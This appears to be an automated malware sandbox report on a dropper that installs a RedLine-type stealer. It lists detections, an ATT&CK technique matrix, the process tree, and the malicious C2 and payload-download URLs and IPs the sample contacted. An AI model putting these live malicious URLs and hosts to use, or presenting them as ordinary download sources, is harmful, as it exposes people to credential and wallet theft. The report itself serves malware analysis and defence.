                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                            Source: Yara matchFile source: 31.2.cmd.exe.5ac00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.2.cmd.exe.5ac00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.MSBuild.exe.610000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000016.00000002.1714070421.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.2498896890.00000000006CB000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000002.2051122015.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.2522072387.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: u48o.0.exe PID: 3912, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7404, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wyftaheq, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\pfswlxy, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.5c90e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.5c90e67.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.3.u48o.0.exe.5cc0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25659b50000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256726b0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25659b50000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256726b0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000000.1530072053.00000256544FB000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                            Source: Yara matchFile source: 31.2.cmd.exe.5ac00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.2.cmd.exe.5ac00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000016.00000002.1714070421.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000002.2051122015.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7404, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wyftaheq, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\pfswlxy, type: DROPPED
                            Source: Yara matchFile source: 0000000A.00000002.1688142273.0000000004082000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: u48o.0.exe PID: 3912, type: MEMORYSTR
                            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                            Source: Yara matchFile source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.5c90e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.u48o.0.exe.5c90e67.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.3.u48o.0.exe.5cc0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: u48o.0.exe PID: 3912, type: MEMORYSTR
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack, type: UNPACKEDPE
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3E0C40 sqlite3_bind_zeroblob,10_2_6C3E0C40
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3E0D60 sqlite3_bind_parameter_name,10_2_6C3E0D60
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C308EA0 sqlite3_clear_bindings,10_2_6C308EA0
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C3E0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,10_2_6C3E0B40
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeCode function: 10_2_6C306410 bind,WSAGetLastError,10_2_6C306410
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts341
                            Windows Management Instrumentation
                            11
                            DLL Side-Loading
                            1
                            Abuse Elevation Control Mechanism
                            11
                            Disable or Modify Tools
                            2
                            OS Credential Dumping
                            2
                            System Time Discovery
                            Remote Services1
                            Archive Collected Data
                            12
                            Ingress Tool Transfer
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts11
                            Native API
                            1
                            Windows Service
                            11
                            DLL Side-Loading
                            1
                            Deobfuscate/Decode Files or Information
                            11
                            Input Capture
                            1
                            Account Discovery
                            Remote Desktop Protocol4
                            Data from Local System
                            22
                            Encrypted Channel
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Command and Scripting Interpreter
                            Logon Script (Windows)1
                            Windows Service
                            1
                            Abuse Elevation Control Mechanism
                            Security Account Manager3
                            File and Directory Discovery
                            SMB/Windows Admin Shares1
                            Screen Capture
                            1
                            Non-Standard Port
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook312
                            Process Injection
                            3
                            Obfuscated Files or Information
                            NTDS288
                            System Information Discovery
                            Distributed Component Object Model1
                            Email Collection
                            3
                            Non-Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                            Software Packing
                            LSA Secrets551
                            Security Software Discovery
                            SSH11
                            Input Capture
                            124
                            Application Layer Protocol
                            Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                            DLL Side-Loading
                            Cached Domain Credentials351
                            Virtualization/Sandbox Evasion
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                            Masquerading
                            DCSync13
                            Process Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job351
                            Virtualization/Sandbox Evasion
                            Proc Filesystem1
                            Application Window Discovery
                            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                            Process Injection
                            /etc/passwd and /etc/shadow1
                            System Owner/User Discovery
                            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430197 Sample: zLwT7vCojz.exe Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 89 download.iolo.net 2->89 91 westus2-2.in.applicationinsights.azure.com 2->91 93 9 other IPs or domains 2->93 117 Snort IDS alert for network traffic 2->117 119 Found malware configuration 2->119 121 Malicious sample detected (through community Yara rule) 2->121 123 17 other signatures 2->123 11 zLwT7vCojz.exe 1 4 2->11         started        16 UniversalInstaller.exe 2->16         started        signatures3 process4 dnsIp5 101 185.172.128.90, 49699, 80 NADYMSS-ASRU Russian Federation 11->101 103 185.172.128.228, 49700, 80 NADYMSS-ASRU Russian Federation 11->103 105 2 other IPs or domains 11->105 81 C:\Users\user\AppData\Local\Temp\u48o.1.exe, PE32 11->81 dropped 83 C:\Users\user\AppData\Local\Temp\u48o.0.exe, PE32 11->83 dropped 85 C:\Users\user\AppData\Local\...\Qg_Appv5.exe, PE32 11->85 dropped 153 Detected unpacking (changes PE section rights) 11->153 155 Detected unpacking (overwrites its own PE header) 11->155 18 u48o.0.exe 77 11->18         started        23 Qg_Appv5.exe 7 11->23         started        25 u48o.1.exe 14 8 11->25         started        27 WerFault.exe 21 16 11->27         started        157 Maps a DLL or memory area into another process 16->157 159 Found direct / indirect Syscall (likely to bypass EDR) 16->159 29 cmd.exe 16->29         started        file6 signatures7 process8 dnsIp9 95 185.172.128.76, 49703, 80 NADYMSS-ASRU Russian Federation 18->95 63 C:\Users\user\AppData\...\softokn3[1].dll, PE32 18->63 dropped 65 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 18->65 dropped 67 C:\Users\user\AppData\...\mozglue[1].dll, PE32 18->67 dropped 77 9 other files (5 malicious) 18->77 dropped 125 Multi AV Scanner detection for dropped file 18->125 127 Detected unpacking (changes PE section rights) 18->127 129 Detected unpacking (overwrites its own PE header) 18->129 139 8 other signatures 18->139 31 WerFault.exe 18->31         started        69 C:\Users\user\AppData\Local\...\relay.dll, PE32 23->69 dropped 71 C:\Users\user\...\UniversalInstaller.exe, PE32 23->71 dropped 73 C:\Users\user\AppData\...\UIxMarketPlugin.dll, PE32 23->73 dropped 131 Found direct / indirect Syscall (likely to bypass EDR) 23->131 33 UniversalInstaller.exe 6 23->33         started        97 svc.iolo.com 20.157.87.45 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 25->97 133 Checks if the current machine is a virtual machine (disk enumeration) 25->133 37 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 25->37         started        75 C:\Users\user\AppData\Local\Temp\wyftaheq, PE32 29->75 dropped 135 Writes to foreign memory regions 29->135 137 Maps a DLL or memory area into another process 29->137 39 MSBuild.exe 29->39         started        41 conhost.exe 29->41         started        file10 signatures11 process12 file13 57 C:\Users\user\AppData\Roaming\...\relay.dll, PE32 33->57 dropped 59 C:\Users\user\...\UniversalInstaller.exe, PE32 33->59 dropped 61 C:\Users\user\AppData\...\UIxMarketPlugin.dll, PE32 33->61 dropped 107 Found direct / indirect Syscall (likely to bypass EDR) 33->107 43 UniversalInstaller.exe 1 33->43         started        109 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->109 111 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 37->111 113 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 37->113 115 Tries to harvest and steal browser information (history, passwords, etc) 39->115 signatures14 process15 signatures16 149 Maps a DLL or memory area into another process 43->149 151 Found direct / indirect Syscall (likely to bypass EDR) 43->151 46 cmd.exe 43->46         started        process17 file18 87 C:\Users\user\AppData\Local\Temp\pfswlxy, PE32 46->87 dropped 161 Writes to foreign memory regions 46->161 163 Found hidden mapped module (file has been removed from disk) 46->163 165 Maps a DLL or memory area into another process 46->165 50 MSBuild.exe 46->50         started        55 conhost.exe 46->55         started        signatures19 process20 dnsIp21 99 91.215.85.66 PINDC-ASRU Russian Federation 50->99 79 C:\Users\user\AppData\...\Secure Preferences, JSON 50->79 dropped 141 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 50->141 143 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 50->143 145 Tries to harvest and steal browser information (history, passwords, etc) 50->145 147 Tries to steal Crypto Currency Wallets 50->147 file22 signatures23

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            zLwT7vCojz.exe39%ReversingLabsWin32.Packed.Generic
                            zLwT7vCojz.exe40%VirustotalBrowse
                            zLwT7vCojz.exe100%AviraHEUR/AGEN.1313018
                            zLwT7vCojz.exe100%Joe Sandbox ML
                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\pfswlxy100%AviraHEUR/AGEN.1307453
                            C:\Users\user\AppData\Local\Temp\pfswlxy100%Joe Sandbox ML
                            C:\ProgramData\freebl3.dll0%ReversingLabs
                            C:\ProgramData\freebl3.dll0%VirustotalBrowse
                            C:\ProgramData\mozglue.dll0%ReversingLabs
                            C:\ProgramData\mozglue.dll0%VirustotalBrowse
                            C:\ProgramData\msvcp140.dll0%ReversingLabs
                            C:\ProgramData\msvcp140.dll0%VirustotalBrowse
                            C:\ProgramData\nss3.dll0%ReversingLabs
                            C:\ProgramData\nss3.dll0%VirustotalBrowse
                            C:\ProgramData\softokn3.dll0%ReversingLabs
                            C:\ProgramData\softokn3.dll0%VirustotalBrowse
                            C:\ProgramData\vcruntime140.dll0%ReversingLabs
                            C:\ProgramData\vcruntime140.dll0%VirustotalBrowse
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll0%VirustotalBrowse
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll0%VirustotalBrowse
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll0%VirustotalBrowse
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll0%VirustotalBrowse
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll0%VirustotalBrowse
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll0%VirustotalBrowse
                            C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe3%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe3%VirustotalBrowse
                            C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll18%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll13%VirustotalBrowse
                            C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe0%VirustotalBrowse
                            C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll0%VirustotalBrowse
                            C:\Users\user\AppData\Local\Temp\pfswlxy59%ReversingLabsByteCode-MSIL.Trojan.RedLine
                            C:\Users\user\AppData\Local\Temp\pfswlxy60%VirustotalBrowse
                            C:\Users\user\AppData\Local\Temp\u48o.0.exe37%ReversingLabsWin32.Packed.Generic
                            C:\Users\user\AppData\Local\Temp\u48o.0.exe42%VirustotalBrowse
                            C:\Users\user\AppData\Local\Temp\u48o.1.exe4%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\u48o.1.exe3%VirustotalBrowse
                            C:\Users\user\AppData\Local\Temp\wyftaheq59%ReversingLabsByteCode-MSIL.Trojan.RedLine
                            C:\Users\user\AppData\Local\Temp\wyftaheq60%VirustotalBrowse
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            bg.microsoft.map.fastly.net0%VirustotalBrowse
                            note.padd.cn.com1%VirustotalBrowse
                            fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                            download.iolo.net0%VirustotalBrowse
                            No Antivirus matches
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            bg.microsoft.map.fastly.net
                            199.232.214.172
                            truefalseunknown
                            iolo0.b-cdn.net
                            169.150.236.99
                            truefalse
                              high
                              note.padd.cn.com
                              176.97.76.106
                              truefalseunknown
                              svc.iolo.com
                              20.157.87.45
                              truefalse
                                high
                                fp2e7a.wpc.phicdn.net
                                192.229.211.108
                                truefalseunknown
                                time.windows.com
                                unknown
                                unknownfalse
                                  high
                                  download.iolo.net
                                  unknown
                                  unknowntrueunknown
                                  westus2-2.in.applicationinsights.azure.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    http://185.172.128.228/BroomSetup.exefalse
                                      185.172.128.76/3cd2b41cbde8fc9c.phptrue
                                        http://185.172.128.76/3cd2b41cbde8fc9c.phptrue
                                          http://185.172.128.76/15f649199f40275b/sqlite3.dlltrue
                                            http://185.172.128.76/15f649199f40275b/softokn3.dlltrue
                                              http://185.172.128.59/syncUpd.exefalse
                                                http://note.padd.cn.com/1/Qg_Appv5.exefalse
                                                  http://185.172.128.76/15f649199f40275b/nss3.dlltrue
                                                    http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0true
                                                      http://185.172.128.76/15f649199f40275b/mozglue.dlltrue
                                                        http://185.172.128.76/15f649199f40275b/msvcp140.dlltrue
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabu48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            https://duckduckgo.com/ac/?q=u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              https://monitor.azure.com//.defaultSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                http://www.vmware.com/0Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    https://snapshot.monitor.azure.com/&SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                      http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.u48o.1.exe, 0000000E.00000003.1718956588.00000000025C4000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002526000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002589000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        http://185.172.128.76/3cd2b41cbde8fc9c.phphmu48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinadSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                            https://www.iolo.com/company/legal/sales-policy/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              http://www.indyproject.org/zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002582000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpfalse
                                                                                https://support.iolo.com/support/solutions/articles/44001781185?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                  https://www.iolo.com/company/legal/privacy/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                    http://www.codeplex.com/CompositeWPFSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                      https://support.iolo.com/support/solutions/articles/44001781185SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.000002565A0D0000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        https://scripts.sil.org/OFLSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2692379137.0000025676C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          https://taskscheduler.codeplex.com/HSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                            http://185.172.128.76/3cd2b41cbde8fc9c.php/mu48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              https://www.iolo.com/company/legal/sales-policy/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                https://scripts.sil.org/OFLX8SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2692379137.0000025676C62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  https://westus2-2.in.applicationinsights.azure.comSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    http://185.172.128.76/3cd2b41cbde8fc9c.php3m1u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmpfalse
